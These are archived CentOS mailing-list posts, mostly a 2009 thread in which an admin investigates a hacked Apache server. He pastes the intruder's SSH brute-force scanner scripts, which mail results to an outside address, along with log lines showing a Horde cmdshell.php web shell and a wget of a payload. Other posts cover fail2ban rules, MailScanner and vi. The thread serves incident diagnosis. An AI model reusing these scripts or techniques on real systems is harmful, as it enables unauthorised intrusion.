Matt, great idea I FOUND SOMETHING... pls see below... From: Matt lm7...@gmail.com To: CentOS mailing list centos@centos.org Sent: Thursday, June 4, 2009 4:40:57 AM Subject: Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell PID USER PR NI VIRT RES SHR S %CPU %MEMTIME+ COMMAND 23119 apache15 0 964 556 472 S 0.7 0.0 0:03.68 atack When i 'ps -ef' i can see many lines as below; apache 24253 23378 0 10:54 ?00:00:00 ./atack 100 apache 24286 23378 0 10:59 ?00:00:00 ./atack 100 I good tool to have on your linux box that may help, some. http://rkhunter.sourceforge.net/ http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter After installing do. rkhunter --update rkhunter -c And see if it finds anything. I DID FIND SOMETHING...NOT SURE WHAT THOUGH ;) * Filesystem checks Checking /dev for suspicious files... [ OK ] Scanning for hidden files... [ Warning! ] --- /etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev --- Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression) /dev/.udev (directory) The contents of the /dev/.udev folder; drwxr-xr-x 2 root root 540 Jun 8 15:41 db drwxr-xr-x 2 root root 740 Jun 8 15:41 failed -rw-r--r-- 1 root root4 Jun 8 15:42 uevent_seqnum The contents of the ../man1/ folder ; [r...@fwg man1]# ls -al :.1.gz -rw-r--r-- 1 root root 40 Jan 22 09:14 :.1.gz [r...@fwgw man1]# ls -al [.1.gz -rw-r--r-- 1 root root 40 Jan 22 09:14 [.1.gz Anything out of the ordinary? Scan results MD5 scan Skipped --- WHY SKIPPED ? bcos OS unknown as shown in the NOTE below? File scan Scanned files: 342 Possible infected files: 0 Application scan Vulnerable applications: 0 Scanning took 32 seconds ... end . NOTE: When we run rkhunter, rkhunter says the lines below...eventhough i installed frm the centos repo? but still it says its an unknown OS Rootkit Hunter 1.2.9 is running Determining OS... Unknown Warning: This operating system is not fully supported! All MD5 checks will be skipped! Anything out of the ordinary? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] setrubleshootd dominating
replies below... - Original Message From: Ralph Angenendt ra+cen...@br-online.de To: centos@centos.org Sent: Saturday, June 13, 2009 2:46:40 PM Subject: Re: [CentOS] setrubleshootd dominating Linux Advocate wrote: strace -p And see what it is doing? does this strace command exist in centos 5.x? Yes. And in 4 and in 3 and in 2.1 - did you look before asking? Ralph yes i did. [r...@fwg man1]# strace -p -bash: strace: command not found [r...@fwg man1]# strace -bash: strace: command not found mayb i have to install something? will check. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
- Original Message From: bruce bedoug...@earthlink.net To: CentOS mailing list centos@centos.org Sent: Thursday, June 4, 2009 3:20:24 AM Subject: Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell and if you don't figure out what caused the issue... working on it bro :) one of the pointers here was to look at alias directives in apache... when i run httpd -S i get these errors... [Sat Jun 13 15:14:09 2009] [warn] The Alias directive in /etc/httpd/conf.d/phpmyadmin.conf at line 11 will probably never match because it overlaps an earlier Alias. [Sat Jun 13 15:14:09 2009] [warn] The Alias directive in /etc/httpd/conf.d/phpmyadmin.conf at line 12 will probably never match because it overlaps an earlier Alias. the contents of /etc/httpd/conf.d/phpmyadmin.conf are; # Web application to manage MySQL # Directory /usr/share/phpmyadmin Order Deny,Allow Deny from all Allow from 127.0.0.1 /Directory Alias /phpmyadmin /usr/share/phpmyadmin --- 1 Alias /phpMyAdmin /usr/share/phpmyadmin --- 2 is this normal ??? Alias /mysqladmin /usr/share/phpmyadmin Is it normal to have these lines? there's not a dammed reason to think you wouldn't do the same thing and get in the same dam situation when you reinstall... agreed. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
- Original Message From: William L. Maltby centos4b...@triad.rr.com To: CentOS mailing list centos@centos.org Sent: Thursday, June 4, 2009 12:56:22 AM Subject: Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell On Wed, 2009-06-03 at 09:33 -0700, Linux Advocate wrote: [r...@fwgw unix]# pwd /dev/shm/unix Note that /dev/shm is a tempfs file system. It will be dynamically populated. I would expect the attack vector still resides on your system somewhere else. i m looking for it bro...the machine is disconnected frm the net but i have not formatted it yet... i really need to know how it happened ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
replies below... - Original Message From: Filipe Brandenburger filbran...@gmail.com To: CentOS mailing list centos@centos.org Sent: Saturday, June 13, 2009 9:58:51 PM Subject: Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell I suggest you start by looking at Apache's logs, Filipe, good idea. will do. look for very strange URLs hat have nothing to do with the applications you have there, like .exe files (IIS attacks) or other .cgi or .php files that will give you 404 errors. Also look for things in the error_log file. And then look for other accesses from the same IP (assuming it's always from the same IP) to files that do exist, this will probably lead you to what was used to break in. Continue the investigation from there. A. I have found susicious ip around the dates ( based on the dates of files in the atack folder) when i think this break-in could hv hapened 86.126.71.74 --- frm romania ( i am in singapore ) This ip seemed to have generated the most error messages. they are other not-frm-country IPs but way way less errors frm them. They are many error messages (generated by 86.126.71.74) in the apache error log as below; [Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php ./x: line 19: log: No such file or directory [Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7c2 [Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0ns0 cat: vuln.txt: No such file or directory --- this vuln.txt is in the /dev/shm/unix/atack folder and also in the /var/tmp/unix/atack folder. Was the atacker looking for this file and then plant it later? or something like that ? [Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 Len 255 256 What does Len 255 256 indicate? Some kind of buffer overflow? B .Can i conclude that the attacker came through the horde framework ( cmdshell.php) ? The horde framework was installed from the centos repo.!!! [r...@fwg]# yum info horde Name : horde Arch : noarch Version: 3.1.7 Release: 1.el5.centos Size : 18 M Repo : installed Summary: The common Horde Framework for all Horde modules. URL: http://www.horde.org/ There are some google hits on cmdshell.php being used to execute arbitrary commands? There is some exploit called CmdShell.Horde.ExploitCheck.Decoy i havent found more info yet. Any tips on this would be most welcome. There is also this line in the error log; [Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t Is the line above normal? C. BUT THE WORST THING OF ALL IS THESE LINES BELOW Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrkqobldem7 --14:47:00-- http://mv.do.am/unix.tgz Rezolvare mv.do.am... 208.100.61.101 Connecting to mv.do.am|208.100.61.101|:80... conectat. Cerere HTTP trimisă, se aşteaptă răspuns... 200 OK Dimensiune: 1614224 (1,5M) [application/octet-stream] Saving to: `unix.tgz' 0K .. .. .. .. .. 3% 17,6K 87s 50K .. .. .. .. .. 6% 33,7K 64s 100K .. .. .. .. .. 9% 33,5K 55s 150K .. .. .. .. .. 12% 45,6K 48s 200K .. .. .. .. .. 15% 52,8K 42s 250K .. .. .. .. .. 19% 50,3K 38s 300K .. .. .. .. .. 22% 47,9K 35s 350K .. .. .. .. .. 25% 54,8K 32s 400K .. .. .. .. .. 28% 48,7K 30s 450K .. .. .. .. .. 31% 36,9K 28s 500K .. .. .. .. .. 34% 34,6K 27s 550K .. .. .. .. .. 38% 32,9K 26s 600K ..
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
My replies below i m just so down in the dumps nowaaah - Original Message From: Neil Aggarwal n...@jammconsulting.com To: CentOS mailing list centos@centos.org Sent: Wednesday, June 3, 2009 1:38:05 PM Subject: Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell The original poster stated he did know how what the process was. He stated he believed the machine was being attacked. He asked for advice from the community on how to handle the situation. yes. this was and is still my understanding. This was what 'top' showed... PID USER PR NI VIRT RES SHR S %CPU %MEMTIME+ COMMAND 23119 apache15 0 964 556 472 S 0.7 0.0 0:03.68 atack 23479 apache15 0 964 556 472 S 0.7 0.0 0:01.94 atack 22170 apache15 0 964 560 472 S 0.3 0.0 0:05.23 atack 22375 apache15 0 964 560 472 S 0.3 0.0 0:04.21 atack 22858 apache15 0 964 560 472 S 0.3 0.0 0:02.87 atack 'ps -ef' showed apache 24253 23378 0 10:54 ?00:00:00 ./atack 100 apache 24286 23378 0 10:59 ?00:00:00 ./atack 100 apache 24292 23378 0 11:00 ?00:00:01 ./atack 100 apache 24335 23378 0 11:01 ?00:00:00 ./atack 100 The original poster's statments imply it was not put there by an authorized user. yes , no one but me has access to the machine. Someone does not just casually assume a machine has been hacked. They have a reason for suspecting it. Applications running; 1 - horde groupware webmail edition, just the framework though. 2 - phpmyadmin 3 - postfixadmin 4 - postfix 5 - dovecot 6. fail2ban 7. monit 2 - 7 i installed from the repos. The centos box was running 5.2 when i first noticed the 'slowness'. i then updated to 5.3 hoping that the problem would go away. i am not worried abt reinstalling ( i loathe doing it ) but my worry here ( as some of you have accurately pointed out ) is that the 'issue' will repeat again bcos i just downt know what happened. I m just surprised that a centos box was compromised. The box is unplugged now. Any more ideas? Regards, Maco. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
- Original Message From: Anne Wilson cannewil...@googlemail.com On Wednesday 03 June 2009 06:09:37 John R. Dennison wrote: He's running an apache instance on cent5. He has processes he can not readily identify running under apache named atack; where does windows come into the equation? Several of the links returned by google have the following info: IIS WebDAV Exploit, I think one of the agobot worms tries to use it to get into Windows boxes. Anne Anne, i m running apache on a centos box. is centos still susceptible? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
as an aside? did he say if he even looked on the net for anything related to this?? i tried googling for 'centos apache atack but did not get anything substantial. i tried locating a binary file called ' atack' but got nothing. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
- Original Message From: John R. Dennison j...@gerdesas.com I stand by my previous advice - the box is compromised, can not be trusted, and as a responsible admin he should be working on re-installing it, evaluating what web-apps he had running that led to this in the first place and taking the appropriate steps to ensure it does not happen again. what steps should i take. i was running centos 5.2 fully updated. the web apps or daemons i have running are from the repos. i have other mandriva boxes and they all are ok. i m just so surprised that a centos box got compromised. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
BRUCE U ARE A F*** GENIUS MAN ! u were right brothanx for spending the time on this man more info below ! - Original Message From: bruce bedoug...@earthlink.net To: linuxhous...@yahoo.com Sent: Wednesday, June 3, 2009 9:53:24 PM Subject: RE: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell hi... i've seen a few of your threads on your issue of the 'atack' processes running from your web server... i'm replying to you offline, as .. take a look over your box, and let's see what you have... as per yr tip i had found a file called atack under this folder /dev/shm/unix even though i could not locate such a file before. i have now removed that file and am now probing the contents of the /dev/shm/unix folder. [r...@fwgw unix]# pwd /dev/shm/unix [r...@fwgw unix]# ls -al total 4352 drwxr-xr-x 2 apache apache 360 Jun 3 23:47 . drwxrwxrwt 3 root root60 Jun 3 00:24 .. -rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22 -rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22 -rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22 -rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22 -rwxr-xr-x 1 apache apache4631 Apr 21 17:50 84.2.find.22 -rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22 -rwxr-xr-x 1 apache apache2362 May 19 15:28 91.204.find.22 -rwxr-xr-x 1 apache apache 216 May 18 2005 auto -rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf -rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find -rw-r--r-- 1 apache apache5262 Jun 3 23:45 log -rwxr-xr-x 1 apache apache 751 May 25 06:33 unix -rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt -rwxr-xr-x 1 apache apache 671 May 25 13:56 x The contents of file 'x' are; #!/bin/bash echo [+] PLM prea destept pentru voi : Yuli [+] X=0 c=0 while [ $X -le 255 ] do c=$RANDOM let c %= 255 echo [+] Scanam radom class b $1.$c [+] ./find $1.$c 22 sleep 10 cat $1.$c.find.22 |sort |uniq ip.conf oopsnr2=`grep -c . ip.conf` echo [+] Incepe partea cea mai misto :D echo [+] Doar $oopsnr2 de servere. Exista un inceput pt. toate ! echo [=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=] echo [+] Incepem sa vedem cate server putem sparge ./atack 100 log mail -s $1.$c yuli1989...@yahoo.com log rm -rf $1.$c.find.22 ip.conf echo [+] Scanner a terminat de scanat ! echo [+] Next random class b ! X=$((X+1)) the contents of the file 'unix' are; #!/bin/bash if [ $# != 1 ]; then echo [+] Folosim : $0 [b class] exit; fi echo [+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+] echo [+] SSH Brute force scanner : user password [+] echo [+]Undernet Channel : #yuli [+] echo [+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+] ./find $1 22 sleep 10 cat $1.find.22 |sort |uniq ip.conf oopsnr2=`grep -c . ip.conf` echo [+] Incepe partea cea mai misto :D echo [+] Doar $oopsnr2 de servere. Exista un inceput pt. toate ! echo [=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=] echo [+] Incepem sa vedem cate server putem sparge ./atack 100 rm -rf $1.find.22 ip.conf echo [+] UnixCoD Scanner a terminat de scanat ! the contents of 'auto' are; #!/bin/sh echo echo Enter A class range read brange echo Enter output file read file crange=0 while [ $crange -lt 255 ] ; do echo -n ./assh $brange.$crange ; $file let crange=crange+1 done the contents of 'log' are; [+] No SSH -www:www:83.246.113.34 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] No SSH -www:www:83.246.119.41 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [
[CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
Guys, apache cpus usage is hitting 100% sometimes ( to such an extent that its very noticeable) on a box with just 8 users or so. i m getting this when i run 'top'. The worrying thing is seeing the work 'atack' under command PID USER PR NI VIRT RES SHR S %CPU %MEMTIME+ COMMAND 23119 apache15 0 964 556 472 S 0.7 0.0 0:03.68 atack 23479 apache15 0 964 556 472 S 0.7 0.0 0:01.94 atack 22170 apache15 0 964 560 472 S 0.3 0.0 0:05.23 atack 22375 apache15 0 964 560 472 S 0.3 0.0 0:04.21 atack 22858 apache15 0 964 560 472 S 0.3 0.0 0:02.87 atack 22997 apache15 0 964 560 472 S 0.3 0.0 0:04.11 atack 22999 apache15 0 964 560 472 S 0.3 0.0 0:02.22 atack 23007 apache15 0 964 560 472 S 0.3 0.0 0:03.79 atack 23099 apache15 0 964 556 472 S 0.3 0.0 0:02.18 atack 23101 apache15 0 964 556 472 S 0.3 0.0 0:02.48 atack 23108 apache15 0 964 556 472 S 0.3 0.0 0:03.59 atack 23109 apache15 0 964 556 472 S 0.3 0.0 0:02.75 atack 23112 apache15 0 972 504 412 S 0.3 0.0 0:04.70 atack 23115 apache15 0 964 556 472 S 0.3 0.0 0:03.75 atack 23116 apache15 0 964 556 472 S 0.3 0.0 0:02.80 atack 23121 apache15 0 972 504 412 S 0.3 0.0 0:03.79 atack 23384 apache15 0 964 556 472 S 0.3 0.0 0:01.63 atack 23389 apache15 0 964 556 472 S 0.3 0.0 0:03.52 atack 23392 apache15 0 964 556 472 S 0.3 0.0 0:01.61 atack 23397 apache15 0 964 556 472 S 0.3 0.0 0:01.62 atack 23405 apache15 0 964 556 472 S 0.3 0.0 0:03.64 atack When i 'ps -ef' i can see many lines as below; apache 24253 23378 0 10:54 ?00:00:00 ./atack 100 apache 24286 23378 0 10:59 ?00:00:00 ./atack 100 apache 24292 23378 0 11:00 ?00:00:01 ./atack 100 apache 24335 23378 0 11:01 ?00:00:00 ./atack 100 apache 24344 23378 0 11:01 ?00:00:00 ./atack 100 apache 24347 23378 0 11:02 ?00:00:00 ./atack 100 apache 24358 23378 0 11:04 ?00:00:00 ./atack 100 Hell, has my centos 5.3 box been hacked??? Help !! ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
sorry typos amended Guys, apache's cpu usage is hitting 100% sometimes ( to such an extent that its very noticeable) on a box ( 2gb ram) with just 8 users or so. This newver happended before. i m getting this when i run 'top'. The worrying thing is seeing the word 'atack' under command PID USER PR NI VIRT RES SHR S %CPU %MEMTIME+ COMMAND 23119 apache15 0 964 556 472 S 0.7 0.0 0:03.68 atack 23479 apache 15 0 964 556 472 S 0.7 0.0 0:01.94 atack 22170 apache15 0 964 560 472 S 0.3 0.0 0:05.23 atack 22375 apache15 0 964 560 472 S 0.3 0.0 0:04.21 atack 22858 apache15 0 964 560 472 S 0.3 0.0 0:02.87 atack 22997 apache15 0 964 560 472 S 0.3 0.0 0:04.11 atack 22999 apache 15 0 964 560 472 S 0.3 0.0 0:02.22 atack 23007 apache15 0 964 560 472 S 0.3 0.0 0:03.79 atack 23099 apache15 0 964 556 472 S 0.3 0.0 0:02.18 atack 23101 apache15 0 964 556 472 S 0.3 0.0 0:02.48 atack 23108 apache15 0 964 556 472 S 0.3 0.0 0:03.59 atack 23109 apache 15 0 964 556 472 S 0.3 0.0 0:02.75 atack 23112 apache15 0 972 504 412 S 0.3 0.0 0:04.70 atack 23115 apache15 0 964 556 472 S 0.3 0.0 0:03.75 atack 23116 apache15 0 964 556 472 S 0.3 0.0 0:02.80 atack 23121 apache15 0 972 504 412 S 0.3 0.0 0:03.79 atack 23384 apache 15 0 964 556 472 S 0.3 0.0 0:01.63 atack 23389 apache15 0 964 556 472 S 0.3 0.0 0:03.52 atack 23392 apache15 0 964 556 472 S 0.3 0.0 0:01.61 atack 23397 apache15 0 964 556 472 S 0.3 0.0 0:01.62 atack 23405 apache15 0 964 556 472 S 0.3 0.0 0:03.64 atack When i 'ps -ef' i can see many lines as below; apache 24253 23378 0 10:54 ?00:00:00 ./atack 100 apache 24286 23378 0 10:59 ? 00:00:00 ./atack 100 apache 24292 23378 0 11:00 ?00:00:01 ./atack 100 apache 24335 23378 0 11:01 ?00:00:00 ./atack 100 apache 24344 23378 0 11:01 ? 00:00:00 ./atack 100 apache 24347 23378 0 11:02 ?00:00:00 ./atack 100 apache 24358 23378 0 11:04 ?00:00:00 ./atack 100 Hell, has my centos 5.3 box been hacked??? Help !! ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
some google foo shows this is a WINDOWS exploit not a linux one. http://www.linuxquestions.org/questions/slackware-14/analyzing-apache-logs-174552/ ___ yes, william, i saw those links when i googledi too did no think it related to me bcos i am on a centos box... ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell....
reply below - Original Message From: John R. Dennison j...@gerdesas.com To: CentOS mailing list centos@centos.org Sent: Wednesday, June 3, 2009 11:43:46 AM Subject: Re: [CentOS] Centos 5.3 - Apache - Under Attack ? Oh hell On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote: Hell, has my centos 5.3 box been hacked??? Help !! Yes. Reinstall; fully update components; restore *data* from backups (you have backups, right?) and review what web packages you have installed and make sure those are fully updated also. Your box is compromised. You have no way to gauge the severity, so treat it as both a lost cause; nothing on it can be trusted at this point. o godd. i have a quite a few linux boxes and not even one has been hacked. oh man !! really??? i have to format the box. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: Torrent software choice
Linux Advocate wrote: is there a cli option? Yes, there is. /usr/bin/bittorrent-console is provided as part of the bittorrent package, available from http://bittorrent.com/ thanx, i will get it frm the rpmforge repo. = Package Arch Version RepositorySize = Installing: bittorrent noarch 4.4.0-1.el5.rf rpmforge-51.1 M Installing for dependencies: python-crypto i386 2.0-1.2.el5.rf rpmforge-5332 k python-khashmir noarch 4.4.0-1.el5.rf rpmforge-5 77 k Transaction Summary = Install 3 Package(s) Update 0 Package(s) Remove 0 Package(s) ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: Torrent software choice
For a GUI, ktorrent scratches my itch. Persists indefinitely -- across power failures, reboots, etc.; provides many stats. From rpmforge: ktorrent-2.2.1-1.el5.rf For a curses solution, I like bittorrent-curses from the bittorrent-4.4.0-1.el5.rf package -- also from rpmforge. is there a cli option? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] How to add ClamAV to Postfix?
Is there some standard way of adding AV to Postfix? clearly the best way is to add a wrapper program like amavisd-new or MailScanner which handles spamassassin and which ever combination of anti-virus programs you use. The postfix list and primary author, Wietse will tell you flat out not to use MailScanner (there's something personal between Wietse and Julian, the author of MailScanner) but I found amavisd-new to be a PITA and just love MailScanner myself and have never had issues with integrating MailScanner into Postfix mail queue. rpmforge has clamav/clamdb packages. MailScanner is available from http://www.mailscanner.info Craig agreed. mailscanner is ok. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Getting ready for CentOS 5.4
but what I worry about is members of the core CentOS team burning out and quitting... that would be much worse for CentOS than a few weeks delay here and there. For me it is important for the core team to know that they can take the time off they need for real life events without feeling bad or guilty about delaying a free, community driven project. totally agree. we need to appreciate them and not be too demanding. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Cannot get CentOS to install
The hardware is P4 2.8 CPU, 512 MB RAM, 120GB 3ware IDE/PATA RAID HD, ATI Video, CDRW CD, Dual Nic, Floppy and IDE/PATA Tape drive. if you could install centos 3 on this hardware, then centos 5.x should work...any error messages from the console? ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Fail2Ban
thanx john - Original Message From: John Lundin lun...@fini.net john, could u share your rules for the dovecot attempts?t Since no one else has stepped up... here's dovecot and vsftpd. These worked for me, ymmv. Centos 5 with rpmforge. Folded, failregex should be a single line with a space between : and authentication. /etc/fail2ban/filter.d/dovecot.conf [Definition] failregex = dovecot-auth: pam_unix\(dovecot:auth\): authentication failure; .* rhost=(?:\s+user=\S*)?\s*$ ignoreregex = /etc/fail2ban/filter.d/vsftpd.conf [Definition] failregex = vsftpd: pam_unix\(vsftpd:auth\): authentication failure; .* rhost=(?:\s+user=\S*)?\s*$ ignoreregex = And changes to /etc/fail2ban/jail.conf. (Note that you also want to change the sendmail actions to use valid email addresses...) diff --git a/jail.conf b/jail.conf index b74320f..a726947 100644 --- a/jail.conf +++ b/jail.conf @@ -113,7 +113,7 @@ bantime = 300 enabled = false filter = vsftpd action = sendmail-whois[name=VSFTPD, dest=...@mail.com] -logpath = /var/log/vsftpd.log +logpath = /var/log/secure maxretry = 5 bantime = 1800 @@ -121,11 +121,11 @@ bantime = 1800 [vsftpd-iptables] -enabled = false +enabled = true filter = vsftpd action = iptables[name=VSFTPD, port=ftp, protocol=tcp] sendmail-whois[name=VSFTPD, dest=...@mail.com] -logpath = /var/log/vsftpd.log +logpath = /var/log/secure maxretry = 5 bantime = 1800 @@ -203,3 +203,25 @@ action = iptables-multiport[name=Named, port=domain,953, protocol=tcp] logpath = /var/log/named/security.log ignoreip = 168.192.0.1 +[dovecot-notification] + +enabled = false +filter = dovecot +action = sendmail-whois[name=Dovecot, dest=...@mail.com] +logpath = /var/log/secure +maxretry = 5 +bantime = 1800 + +# Same as above but with banning the IP address. + +[dovecot-iptables] + +enabled = true +filter = dovecot +action = iptables-multiport[name=Dovecot, port=pop3,pop3s,imap,imaps, protocol=tcp] + sendmail-whois[name=Dovecot, dest=...@mail.com] +logpath = /var/log/secure +maxretry = 5 +bantime = 1800 +#ignoreip = 168.192.0.1 + ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] trying to install 5.2 on a laptop
- Original Message From: Michael Klinosky m...@enter.net The X wiki suggested that I try adding this to /etc/X11/xorg.conf: Section ServerFlags Option AllowMouseOpenFail 1 EndSection Using cat xorg.conf, I seeSection InputDevice , which refers to the Synaptics module. Being new-ish to linux, I can't figure out the text-based editor (vi) to modify the file. I have System Rescue CD and Ultimate Boot CD, but (apparently) they don't mount the installed system. vi is not too difficult. from the commandline prompt, type ; vi /etc/X11/xorg.conf then press the small letter i to allow u to insert text. use the arrow keys to navigate to an empty line and add the text u need. then press ESC. next type; :wq and hit enter. from the commandline use cat to see if the changes u made hv been recorded and then try to reboot. ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] mailscanner installation - centos 5.2 - rpmforge + vanderkooij rpms
thanx. - Original Message From: tdu...@sc.rr.com tdu...@sc.rr.com To: CentOS mailing list centos@centos.org Cc: Linux Advocate linuxhous...@yahoo.com Sent: Saturday, February 28, 2009 11:38:35 PM Subject: Re: [CentOS] mailscanner installation - centos 5.2 - rpmforge + vanderkooij rpms I think ClamAV updates itself via cron. The modules you are missing can be installed from CPAN maybe yum or check Dag Wieers site. Linux Advocate wrote: Guys, i have just installed ( after reading the docs on the mailscanner site and centos lists ) Mailscanner, and was wondering a.) How do i test my installation? is there some sample spam/ virus messages that can be used to test. b.) MailScanner -V shows; b.1) LibClamAV Warning: ** LibClamAV Warning: *** The virus database is older than 7 days! *** LibClamAV Warning: *** Please update it as soon as possible.*** LibClamAV Warning: ** how do i update this database? b.2) there are some modules missing; how do i iinstall them or do i ignore them ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Fail2Ban
Actually, it is a rather OS dependent package and the rules for CentOS are difficult to write. That really doesn't belong on the fail2ban list either. i have a basic fail2ban with tcp-wrappers /etc/hosts.deny combo working. i couldnt get the iptables thing working properly. You don't need shorewall, just the standard CentOS firewall works fine. Just be sure to only enable iptables rules. I have rules working for several things. SSH attempts, Dovecot attempts and a rule to block based on my Spamhaus setup so that the same spammer doesn't keep loading up sendmail with DNS queries. john, could u share your rules for the dovecot attempts?t ___ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] centos 5.2 - latest rpms for mailcanner , clamav and spamassassin
